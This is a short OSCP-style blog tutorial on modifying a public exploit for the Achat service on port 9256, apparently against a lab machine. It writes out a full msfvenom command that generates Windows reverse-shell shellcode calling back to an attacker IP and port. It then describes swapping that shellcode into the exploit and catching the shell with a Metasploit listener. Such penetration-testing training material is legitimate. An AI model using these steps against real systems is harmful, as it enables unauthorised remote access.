/ OSCP

Modifying exploits - Generate your own shellcode

Following my other post on modifying exploits, this post will outline a hands-on example to tailor an exploit to our specific situation.

On a box, we found the vulnerable service achat running on port 9256, which should be vulnerable to this exploit.

After analyzing the current exploit, we see in the comments (green highlighted part) that the current payload shellcode (the second highlighted part) is opening calc.exe via cmd. Wouldn't it be nice if we could spawn a reverse shell instead?

exploit

To generate shellcode with the payload we like (a reverse shell connecting to our IP and port), we used msfvenom with a modified payload parameter (-p).

msfvenom -a x86 --platform Windows -p windows/shell/reverse_tcp LHOST=10.10.14.6 LPORT=4444 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python 

The first (red) highlighted part shows our modified msfvenom command, the second (green) highlighted part shows our new generated shellcode.

msfvenom_2

Now replace the shellcode from the original exploit with your newly generated exploit code (the green highlighted part in the screenshot above) and adjust the target port and ip to your victim's.

PrtScr-capture_4

Now, setup a listener in metasploit. Use the same payload as you defined in your payload.

multi-handler
note: my lhost ip differs from the ip used when generating the shellcode because my internal ip changed from 10.10.14.6 to 10.10.14.8 whilst writing this post. You should just take the same ip as you used when generating your shellcode.

Next step is executing the python exploit you've modified with your generated shellcode. It should now connect to your listener. Don't forget to CHMOD +X your exploit to make it executable.

hacked